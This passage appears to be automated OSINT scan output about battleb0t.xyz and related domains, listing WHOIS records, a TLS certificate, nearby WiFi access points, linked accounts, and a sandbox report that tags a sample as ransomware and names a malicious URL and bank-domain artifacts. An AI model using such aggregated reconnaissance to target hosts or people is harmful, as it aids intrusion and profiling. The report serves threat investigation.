"https://bouncefitness.precisiongroup.com.au/my-account/"\n Pattern match: "http://www.w3.org/2000/svg\'%20view | 104.21.6.166 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 089070 (Net ID: 00:02:2D:08:90:70) | 37.780462,-122.390564 |
| 2023-05-12 03:33:40 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
_Z19l
?_ILPJ
C $/@
0\Mjf!
/VppGp
ChPwap
fzcoAC
P6s>W
4q:P?
_6Wp@
T'V51
>Lv t0
qDXT<?95
@pjrR
_ij>g
rd-2mp
:!xn2@
V4vbR
isgWO
fROLL
3coz:
m"cccM
4Xnju
KWnk.
4 x"i
W3KJe:
886jm
"yuV @B
UcsPm
C8unz
TjZ\\
7I018
h>4vW
iEBYs
`jclr
B2sj$
\evww-R
' :PGJ
h-G>d
Nuvra
<z6mj3
zK/g_
DL$p'
` 24`
lBoyyy
ni6N_
j >fw
CKMzvy
LjsoM
/kuuQ?
qdjrg7
wwwtx
issIG
_Mf !z
?wKQ/
R RP"
H`4<j
/qdP9$
ZN\D@
nsn6L
LMihx
mIhtb\
<A>Qm
6<7.Hm
V3.j$`
WC@@\
t:10fW
lfLFY
>t<F:Si
ctr4z
1w5\A
Wcll2-
SvSif
l4es`t$'
6yxj:
c\s.O
@'-mG
.9397
4enn6wj
"`Jpi':
gcqu3
xjq9f
7`N.8
2HuNNJn
kWcU
OEj'`r
5<k@Q:
_-3"X
B'PtqJ
l$eUY
Sqf_8M
v:1?2
emm--A@h"Ew
\K0vw
f3U4eH
IDATX
Y>W'P
W \@46
nZ3JK | https://pics.battleb0t.xyz/images/ein_1.png |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3037::6815:470e | battleb0t.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242505 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515724F5 (Net ID: 00:01:E3:57:24:F5) | 52.3759, 4.8975 |
| 2023-05-12 02:46:25 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:fd:f2:48:0f:df:bc:e1:99:1b:6f:bd:c7:77:
53:7a:c0:8b:77:cd:2c:3c:60:53:e0:e9:b0:a7:7b:
73:98:97:7e:b8:eb:d6:f1:08:7b:2c:70:98:ff:62:
24:3a:e4:75:75:15:64:3c:f3:10:df:1f:74:86:c2:
03:e3:19:f8:ee:1b:1c:a4:33:45:b3:b5:bd:cc:36:
58:4b:c6:53:5a:e5:a0:83:1c:13:b6:0a:f0:09:85:
49:e2:af:1f:59:f3:45:35:c5:76:d8:d7:03:6b:48:
2d:81:71:8d:d8:b6:9f:ca:3d:be:a5:d1:d0:6d:84:
3f:57:a3:f9:3b:33:48:5e:3a:10:1b:9a:8e:0e:52:
e4:41:61:32:48:9e:eb:dd:91:27:08:98:23:0d:d6:
40:40:46:c6:2e:72:9b:5e:7b:a7:ce:14:5c:e3:33:
d1:e0:7f:e9:bf:c8:04:bf:dd:c3:5b:ec:18:53:dc:
e8:49:50:75:f5:f6:57:2f:90:7f:b7:6a:c4:1e:bc:
3e:2d:04:87:d0:de:ec:72:7e:5e:84:cf:77:05:c4:
81:0d:1d:68:c9:a6:7c:75:bd:ed:fa:cd:4e:88:39:
5c:0c:10:a3:f5:6d:4b:7d:20:b4:0a:24:fb:93:43:
e5:9b:70:b2:e4:95:89:06:02:90:7a:2d:6f:c2:fa:
77:78:2c:13:6f:d6:08:02:00:eb:f1:d0:25:de:0b:
0c:36:d6:0b:0b:8d:58:6f:b7:29:51:a7:c3:27:fb:
ab:fa:3f:bd:88:88:4d:63:79:00:4e:5f:ea:ff:bf:
a7:e5:c8:b9:01:b0:11:55:38:c5:2c:12:42:ec:9f:
41:d5:d8:5b:cb:0e:56:2f:f5:0b:5b:b2:1f:2e:4b:
1c:7b:f3:b8:8f:a3:2a:22:10:32:70:e5:ff:92:c9:
9d:cf:f4:1c:87:80:7b:03:c4:11:f8:c8:fe:1d:fd:
d9:21:53:2a:ab:a4:e1:88:2f:4b:5d:2f:ee:62:ac:
58:24:c3:6b:51:75:98:92:28:85:71:19:cf:1f:32:
bf:04:e0:46:cb:6a:6e:1a:53:77:bb:51:7b:25:a8:
3b:79:a4:fe:31:da:29:cb:94:14:d8:b7:bf:23:48:
40:7c:38:77:e2:71:aa:43:c0:dd:58:a7:d1:0f:28:
19:e1:e9:99:2b:f4:ba:45:c8:6a:f8:d6:7a:86:7e:
a9:1e:96:ed:9c:c8:12:b9:05:83:95:70:08:f4:a3:
69:c3:37:93:d6:82:c5:85:91:d6:07:1b:87:31:af:
f4:29:c3:da:2f:cb:d0:72:02:68:65:19:d7:78:65:
82:75:d2:3a:e3:90:30:94:d9:d7:ad:e9:8d:db:16:
21:a3:69
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:05.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:6A:5D:4C:DD:33:BA:F4:6D:06:CD:62:8E:
62:A6:29:12:73:7E:C4:39:CD:7D:CB:4D:69:0D:6B:E6:
45:D1:49:BA:02:20:62:DC:B1:D6:60:8B:66:25:C3:6B:
92:41:2D:6B:D9:09:69:75:B3:D8:0A:B3:0D:7C:54:94:
66:20:F5:CC:6B:CE
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 10:44:05.107 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:1E:C1:82:64:68:53:D0:B4:02:DB:
57:9B:B5:22:1E:9E:35:DC:46:F1:4F:28:01:0D:8C:E2:
45:59:C5:A9:E3:02:21:00:96:C6:99:D6:12:DF:9E:19:
D7:CD:44:66:3D:89:58:9B:65:51:7C:84:99:4A:C9:3C:
8B:FE:37:A8:47:DE:C3:56
Signature Algorithm: sha256WithRSAEncryption
41:96:b5:7d:95:d4:ae:2d:a9:b4:a2:a9:03:e1:6c:2c:ea:0b:
12:67:47:89:ea:84:af:bc:58:df:6e:9e:7a:17:58:2c:fc:ee:
11:c4:75:03:fe:d2:23:80:47:ef:3d:f5:e5:85:f3:73:e7:e9:
a1:39:06:c3:b0:7b:8d:b5:5d:d0:86:03:d3:f0:e2:af:ce:56:
94:97:70:df:5f:13:c2:f2:0c:0e:3f:44:5f:9e:08:77:8b:e6:
63:50:70:6c:63:3d:92:b8:47:22:c8:bb:cb:d9:49:34:87:f7:
e2:00:f1:f4:7c:31:9b:cf:cf:90:32:54:5b:7a:ef:36:94:28:
65:2b:6e:da:99:67:84:fc:a6:85:ec:a5:21:86:4c:1e:b9:bf:
c1:78:0c:7d:6f:7b:a9:50:f0:ef:72:58:32:06:0c:16:de:59:
67:a5:1c:78:dd:a6:2d:3d:28:7f:42:c7:3b:53:0e:90:8f:81:
59:03:3d:d2:aa:47:fb:09:53:87:e3:c8:82:e2:86:64:89:77:
d1:60:50:5c:4a:fa:5f:c3:d3:98:9d:1d:83:27:60:ff:97:a3:
81:ce:78:29:a2:b7:68:63:8d:a5:42:50:56:9e:a6:9b:1c:0b:
e6:30:3b:4d:cb:fe:88:86:0f:0c:9c:8b:ca:5a:30:20:2e:22:
ad:5a:67:9d
| battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000000jihyun.github.io | 185.199.111.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRBEACH (Net ID: 00:02:2D:8A:07:06) | 34.0544, -118.244 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | championat (Category: news)
https://www.championat.com/user/login/ | login |
| 2023-05-12 02:45:11 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 172.67.135.9 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/gallery.css | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | https://kekw.battleb0t.xyz/jar | kekw.battleb0t.xyz |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayha.xyz | ayhu.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | EWireless (Net ID: 00:06:25:B0:C4:C9) | 39.0469, -77.4903 |
| 2023-05-12 02:54:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'ransomware'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 15, u'threat_score': 97, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-806670.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1572:120:WilError_01"\n "Local\\SM0:1572:120:WilError_01"\n "Local\\SM0:1572:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:1572:304:WilStaging_02"\n "SM0:1572:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1572:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1572:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1572:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:49742"\n "104.17.25.14:49744"\n "185.199.109.153:49746"\n "13.227.74.44:49747"\n "149.154.167.220:49748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "cdnjs.cloudflare.com"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "aggiedashhelp@ucdavis.edu"\n Pattern match: "rrf@0.53"\n Pattern match: "rf@0.53"\n Pattern match: "rrf@0.11"\n Pattern match: "rf@0.11"\n Pattern match: "rrf@0.99"\n Pattern match: "rf@0.99"\n Pattern match: "rrf@0.78"\n Pattern match: "rf@0.78"\n Pattern match: "rrf@0.26"\n Pattern match: "rf@0.26"\n Pattern match: "rrf@0.25"\n Pattern match: "rf@0.25"\n Pattern match: "rrf@0.13"\n Pattern match: "rf@0.13"\n Pattern match: "rrf@0.17"\n Pattern match: "rf@0.17"\n Pattern match: "rrf@0.66"\n Pattern match: "rf@0.66"\n Pattern match: "rrf@0.36"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"facebook.com" (Indicator: "facebook.com")\n "netflix.com" (Indicator: "netflix.com")\n "youtube.com" (Indicator: "youtube")\n "twitter.com" (Indicator: "twitter")\n "www.netflix.com" (Indicator: "netflix.com")\n "www.facebook.com" (Indicator: "facebook.com")\n "You can add Flipgrid and YouTube videos to PDFs as comments.We would love to hear any enhancements you would like to see in this feature. Please use the send feedback option or tweet with #EdgeEdu #EdgeCamera)PresentComment SavedComment DeletedThis file is password protected. Please enter a password to open the file.Enter a passwordCheck your passwordWe can\'t open this fileSign in to open this fileThis is a protected file. Sign in with your work or school account to open it.Need permissionsContact the owner of the file to give you permissions.Switch to a work or school accountThis file is protected. To open it, go to Settings and more" (Indicator: "youtube")\n "px.ads.linkedin.com" (Indicator: "linkedin.com")\n "ds.linkedin.com" (Indicator: "linkedin.com")\n "https://px.ads.linkedin.com:443,*" (Indicator: "linkedin.com")\n "settings.force_youtube_restrict" (Indicator: "youtube")\n "YouTube-Restrict" (Indicator: "youtube")\n "https://*.facebook.com/*" (Indicator: "facebook.com")\n "(.*\\/\\/.*linkedin.com\\/jobs\\/view\\/.*|.*\\/\\/.*linkedin.com\\/jobs\\/collections\\/.*currentjobid=.*|.*\\/\\/.*snagajob.com\\/jobs.*|.*\\/\\/.*careerbuilder.com\\/job\\/.*|.*\\/\\/.*monster.com\\/job-openings\\/*.*|.*\\/\\/.*ziprecruiter.com\\/c\\/.+?\\/Job\\/.*)" (Indicator: "linkedin.com")\n ".youtube.com" (Indicator: "youtube")\n "=facebook.com" (Indicator: "facebook.com")\n "ads-twitter.com/" (Indicator: "twitter")\n "twittercounter.com/" (Indicator: "twitter")\n "youtube.com/" (Indicator: "youtube")\n "twitter.jp/" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-146', u'name': u'Found named pipe like strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1570', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1570', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string - CHROME_CRASHPAD_PIPE_NAME=\\\\.\\pipe\\LOCAL\\crashpad_1572_AZVWUJPMBOHDUOUN\n Found string - \\\\.\\pipe\\LOCAL\\crashpad_1572_AZVWUJPMBOHDUOUN\n Found string - \\\\.\\pipe\\%ls\\%ls\n Found string - \\\\.\\pipe\\LOCAL\\crashpad_%lu_\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Applicati\\\\.\\pipe\\LOCAL\\chrome.sync.\n Found string - \\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\\\.\\pipe\\LOCAL\\chrome.sync.\n Found string - \\\\\\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\\\.\\pipe\\\\??\\pipe\\chrome.\n Found string - \\\\.\\pipe\\LOCA\\??\\pipe\\edge.\n Found string - \\\\\\\\.\\pipe\\\\??\\pipe\\chrome.\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\.\\pipe\\\\??\\pipe\\chrome.'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-154', u'name': u'Found suspicious keywords in script (string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed keyword:"WinHTTP" [Source: 00000000-00001572.00000000.75966.ADE46000.00000002.mdmp\n 00000000-00001572.00000001.77885.ADE46000.00000002.mdmp\n 00000000-00001572.00000002.79803.ADE46000.00000002.mdmp]'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"kyc.icicibank.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "icicibank.com")\n "buy.icicibank.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "icicibank.com")\n "bmo.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "bmo.com")\n "genesishealthclubs.com/" (Source: 00000000-00001572.00000001.77885.0031C000.00000004.mdmp, 00000000-00001572.00000002.79803.0031C000.00000004.mdmp, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00001572]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1572_1550619549\\product_page.js]- [targetUID: 00000000-00001572]\n "2280391a-a00b-4307-9daf-4a0cf2eff0a0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00001572]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%TEMP%\\1572_918905705\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00001572]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00001572]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\1572_677600543\\_metadata\\verified_contents.json]- [targetUID: 00000000-00001572]\n "75f02fdd-22ef-4746-8063-dfec8b5ab9ea.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\75f02fdd-22ef-4746-8063-dfec8b5ab9ea.tmp]- [targetUID: 00000000-00001572]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cf-ray: 7c5f60363a5a178c-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 122.48.229.35.bc.googleusercontent.com | 35.229.48.122 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.167): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
